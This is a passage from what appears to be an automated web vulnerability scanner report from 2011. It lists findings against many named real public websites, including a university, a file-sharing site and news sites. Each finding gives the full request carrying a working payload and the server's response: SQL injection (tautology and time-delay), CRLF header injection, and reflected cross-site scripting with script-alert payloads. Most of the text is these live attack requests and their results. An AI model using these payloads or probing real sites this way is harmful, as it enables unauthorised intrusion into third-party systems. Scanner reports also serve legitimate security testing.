Host: www.smartertravel.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:21:54 GMT
Server: Apache
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STM=0d3cf84215c4b8a2a44b1d83d5a67dcc648387b449ecbac8670f031dc81b830a817581c669549fdb15b6091f43f06171959e9c6c6f48be1383dd4130c96755c2; expires=Sun, 01-Apr-2012 02:21:54 GMT; path=/
Set-Cookie: vid=4d968842733f73.09988363; path=/; domain=.smartertravel.com
Set-Cookie: uu=20839c2b-dfe9-46c5-bd8a-75604c445a31; path=/; domain=.smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 02-Apr-2010 02:21:53 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 02-Apr-2010 02:21:53 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 02-Apr-2010 02:21:53 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Set-Cookie: entry_time=time; path=/; domain=smartertravel.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 23871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
<img src="http://stats.smartertravel.com/b/ss/sltravelcom/1/H.10--NS/268758348?g=http%3A%2F%2Fwww.smartertravel.com%2Ferrordocs%2F404.php&amp;r=&amp;s.eVar37=1%7CI4&amp;s.channel=404+Error&amp;s.eVar24=404+Error&amp;s.pageType=errorPage&amp;s.server=app24&amp;s.eVar11=22&amp;s.events=event11%2Cevent12%2Cevent15" height="1" width="1" border="0" alt="" /></a></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.10. -->
</div>

<div id="outer_wrapper">

<div id="wrapper">
   <p class="hide"><a href="#top">Skip navigation</a></p>
<div id="masthead">
           <a href="http://www.smartertravel.com/">
           <img src="http://i.slimg.com/st/header/2.0/header-bg-left.gif" alt="Cheap Airfare, Vacation Deals, Car Rental, and Discount Travel - SmarterTravel.com" />
       </a>
       <div class='search_wrapper'><div class='search'>
       <form method="get" action="http://www.smartertravel.com/search/" target="_top">
           <input type="text" class="search_text" name="q" value=""/> <input type="image" class="search_submit" src="http://i.slimg.com/st/buttons/pluck/1.2/search.png" alt="Search Button"/>
       </form>
   </div></div>
   <div id="MySmarterTravel">
   <div class="st_profile_image">
       <div class="st_profile_shadow"><img src="http://i.slimg.com/st/avatar-shadow.png" alt="shadow" /></div>
       <div class="st_profile_actual_image"><a href="http://www.smartertravel.com/community/"><img src="http://sitelife.smartertravel.com/ver1.0/Content/images/no-user-image.gif" alt="User's Avatar" /></a></div>
   </div>
   <div class="st_header">My SmarterTravel</div>
   <div class="st_links">
       <a href="/community/login.php" id="login_layer">Log In</a> |
       <a href="/community/register.php" id="signup_layer">Join Now</a>    </div>
</div>
   <!-- <div class="survey_wrapper"><span class="obf href:$|d~$|i~0tvc0tvswfz/qiq@sfuvso>$|d~$|i~0tfswfs.tubuvt72969556(&31ps&312&4e3..&31@IUUQIPTU>$|i~" id="4d96884290749" >Join our survey panel</span></div> -->
</div>

<ul id="topnav_tabs">
<li id="st_home_page_tab" class="nav_tab"><a href="/" target="_top" rel="nofollow"><span>home</span></a><ul><li>&nb
...[SNIP]...

1.14. http://www.tech-recipes.com/server-info [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.tech-recipes.com
Path:   /server-info

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 18776569'%20or%201%3d1--%20 was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Request

GET /server-info18776569'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tech-recipes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 01:57:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: W3 Total Cache/0.8.5.2
X-Pingback: http://www.tech-recipes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 01:57:24 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head profile="http://
...[SNIP]...
<a href="http://www.tech-recipes.com/category/database/" title="mysql, postgresql, oracle, tables, database,">
...[SNIP]...

1.15. http://www.tech-recipes.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.tech-recipes.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 29838048'%20or%201%3d1--%20 was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Request

GET /server-status29838048'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tech-recipes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:32:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: W3 Total Cache/0.8.5.2
X-Pingback: http://www.tech-recipes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 02:32:28 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head profile="http://
...[SNIP]...
<a href="http://www.tech-recipes.com/category/database/" title="mysql, postgresql, oracle, tables, database,">
...[SNIP]...

1.16. http://www.travelscream.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.travelscream.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /server-status' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.travelscream.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:47:02 GMT
Server: PWS/1.7.1.5
X-Px: ms iad-agg-n22 ( iad-agg-n12), ms iad-agg-n12 ( origin)
ETag: "6a1aeb994e58cb1:0"
Cache-Control: max-age=604800
Expires: Sat, 09 Apr 2011 02:47:02 GMT
Age: 0
Content-Type: text/html
Last-Modified: Sun, 19 Sep 2010 23:01:32 GMT
Connection: keep-alive
Content-Length: 7796

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
   <head id="_ctl0_Head1"><title>
Travelscream - Error
</title><
...[SNIP]...

Request 2

GET /server-status'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.travelscream.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:47:02 GMT
Server: PWS/1.7.1.5
X-Px: ms iad-agg-n22 ( iad-agg-n28), ms iad-agg-n28 ( origin>CONN)
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: max-age=1200
Expires: Sat, 02 Apr 2011 03:07:02 GMT
Age: 1
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Content-Length: 241770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c
...[SNIP]...

1.17. http://www.usf.edu/server-info [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usf.edu
Path:   /server-info

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 20192 milliseconds to respond to the request, compared with 49 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /server-info'waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usf.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 01:56:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 6712
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSRSTRAB=DNBJAMADIENPAGGEAJEJHAOO; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

   <head>
       <meta
...[SNIP]...

1.18. http://www.usf.edu/server-info [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usf.edu
Path:   /server-info

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter. The application took 20194 milliseconds to respond to the request, compared with 49 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /server-info?1'waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usf.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 01:54:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 6712
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSRSTRAB=AJBJAMADIEKOLOGDIBAHAPEE; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

   <head>
       <meta
...[SNIP]...

1.19. http://www.usf.edu/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usf.edu
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 20233 milliseconds to respond to the request, compared with 50 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /server-status'waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usf.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:29:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 6712
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSCBACQA=CECKKBBDAIJFLPOLOBMEBOKM; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

   <head>
       <meta
...[SNIP]...

1.20. http://www.usf.edu/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usf.edu
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter. The application took 20180 milliseconds to respond to the request, compared with 50 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /server-status?1'waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usf.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:28:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 6712
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSCBACQA=OPBKKBBDICKKJIJNMFJCGNLO; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

   <head>
       <meta
...[SNIP]...

1.21. http://www.x17online.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x17online.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /server-status' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.x17online.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not found
Date: Sat, 02 Apr 2011 02:27:10 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Content-Length: 1787

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/') or (fileinfo_url like '/server-status'/index%'))
and bl' at line 5</font>
...[SNIP]...

Request 2

GET /server-status'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.x17online.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not found
Date: Sat, 02 Apr 2011 02:27:10 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Content-Length: 1444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">
<head>

...[SNIP]...

2. HTTP header injection
There are 3 instances of this issue:

2.1. http://www.elitistjerks.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elitistjerks.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload f5d71%0d%0a88453c48322 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /f5d71%0d%0a88453c48322 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elitistjerks.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.67
Date: Sat, 02 Apr 2011 02:14:47 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: http://elitistjerks.com/f5d71
88453c48322


<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/0.7.67</center>
</body>
</html>

2.2. http://www.ew.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ew.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ef893%0d%0a9bc56d771c9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /ef893%0d%0a9bc56d771c9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ew.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 02:51:41 GMT
Location: http://www.ew.com/ew/ef893
9bc56d771c9

Vary: Accept-Encoding
Content-Length: 307
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.ew.com/ew/ef
...[SNIP]...

2.3. http://www.people.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.people.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 78778%0d%0a53901b7acc7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /78778%0d%0a53901b7acc7 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.people.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 02:35:46 GMT
Location: http://www.people.com/people/78778
53901b7acc7

Vary: Accept-Encoding
Content-Length: 319
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.people.com/p
...[SNIP]...

3. Cross-site scripting (reflected)
There are 113 instances of this issue:

3.1. http://www.2dopeboyz.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.2dopeboyz.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2b6e</script><script>alert(1)</script>6f4ec5e7979 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusd2b6e</script><script>alert(1)</script>6f4ec5e7979 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.2dopeboyz.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:49:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
Vary: Cookie,Accept-Encoding,User-Agent
X-Pingback: http://www.2dopeboyz.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 02:49:38 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 5932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
   <head prof
...[SNIP]...
<script>
COMSCORE.beacon({
c1:2,
c2:6685975,
c3:"",
c4:"www.2dopeboyz.com/server-statusd2b6e</script><script>alert(1)</script>6f4ec5e7979",
c5:"",
c6:"",
c15:""
});
</script>
...[SNIP]...

3.2. http://www.2dopeboyz.com/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.2dopeboyz.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee082</script><script>alert(1)</script>c7340aa2e43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?ee082</script><script>alert(1)</script>c7340aa2e43=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.2dopeboyz.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:49:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
Vary: Cookie,Accept-Encoding,User-Agent
X-Pingback: http://www.2dopeboyz.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 02:49:09 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 5938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
   <head prof
...[SNIP]...
<script>
COMSCORE.beacon({
c1:2,
c2:6685975,
c3:"",
c4:"www.2dopeboyz.com/server-status?ee082</script><script>alert(1)</script>c7340aa2e43=1",
c5:"",
c6:"",
c15:""
});
</script>
...[SNIP]...

3.3. http://www.4shared.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f015'-alert(1)-'ee443a28691 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status2f015'-alert(1)-'ee443a28691 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.4shared.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 /server-status2f015'-alert(1)-'ee443a28691
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 02 Apr 2011 02:40:06 GMT
Content-Length: 41893


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
f loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/server-status2f015'-alert(1)-'ee443a28691',
remember : false


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

3.4. http://www.4shared.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52eac"-alert(1)-"c7ae2db8b75 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status52eac"-alert(1)-"c7ae2db8b75 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.4shared.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 /server-status52eac&quot;-alert(1)-&quot;c7ae2db8b75
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 02 Apr 2011 02:40:04 GMT
Content-Length: 41893


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/server-status52eac"-alert(1)-"c7ae2db8b75";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.5. http://www.abcteach.com/server-info [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abcteach.com
Path:   /server-info

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 15610><script>alert(1)</script>c9fa08d7d35 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-info15610><script>alert(1)</script>c9fa08d7d35 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.abcteach.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 01:58:11 GMT
Server: Apache/2.2.6 (FreeBSD) mod_ssl/2.2.6 OpenSSL/0.9.7e-p1 DAV/2 PHP/4.4.7 with Suhosin-Patch
X-Powered-By: PHP/4.4.7
Vary: Accept-Encoding
Content-Length: 562
Content-Type: text/html

<html>
<head>
<title>Missing Page</title>
</head>

<body>
<H1>Missing Page</H1>

You have requested a page that has moved or is missing.
<br><br>
<form method="post" action="/globals/record_bad_url.ph
...[SNIP]...
<input type=hidden value=/server-info15610><script>alert(1)</script>c9fa08d7d35 name=request>
...[SNIP]...

3.6. http://www.abcteach.com/server-info [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abcteach.com
Path:   /server-info

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload b06c8><script>alert(1)</script>c84e0f6ed17 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-info?b06c8><script>alert(1)</script>c84e0f6ed17=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.abcteach.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 01:58:03 GMT
Server: Apache/2.2.6 (FreeBSD) mod_ssl/2.2.6 OpenSSL/0.9.7e-p1 DAV/2 PHP/4.4.7 with Suhosin-Patch
X-Powered-By: PHP/4.4.7
Vary: Accept-Encoding
Content-Length: 565
Content-Type: text/html

<html>
<head>
<title>Missing Page</title>
</head>

<body>
<H1>Missing Page</H1>

You have requested a page that has moved or is missing.
<br><br>
<form method="post" action="/globals/record_bad_url.ph
...[SNIP]...
<input type=hidden value=/server-info?b06c8><script>alert(1)</script>c84e0f6ed17=1 name=request>
...[SNIP]...

3.7. http://www.abcteach.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abcteach.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 59d76><script>alert(1)</script>51688ab36bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status59d76><script>alert(1)</script>51688ab36bf HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.abcteach.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:34:50 GMT
Server: Apache/2.2.6 (FreeBSD) mod_ssl/2.2.6 OpenSSL/0.9.7e-p1 DAV/2 PHP/4.4.7 with Suhosin-Patch
X-Powered-By: PHP/4.4.7
Vary: Accept-Encoding
Content-Length: 564
Content-Type: text/html

<html>
<head>
<title>Missing Page</title>
</head>

<body>
<H1>Missing Page</H1>

You have requested a page that has moved or is missing.
<br><br>
<form method="post" action="/globals/record_bad_url.ph
...[SNIP]...
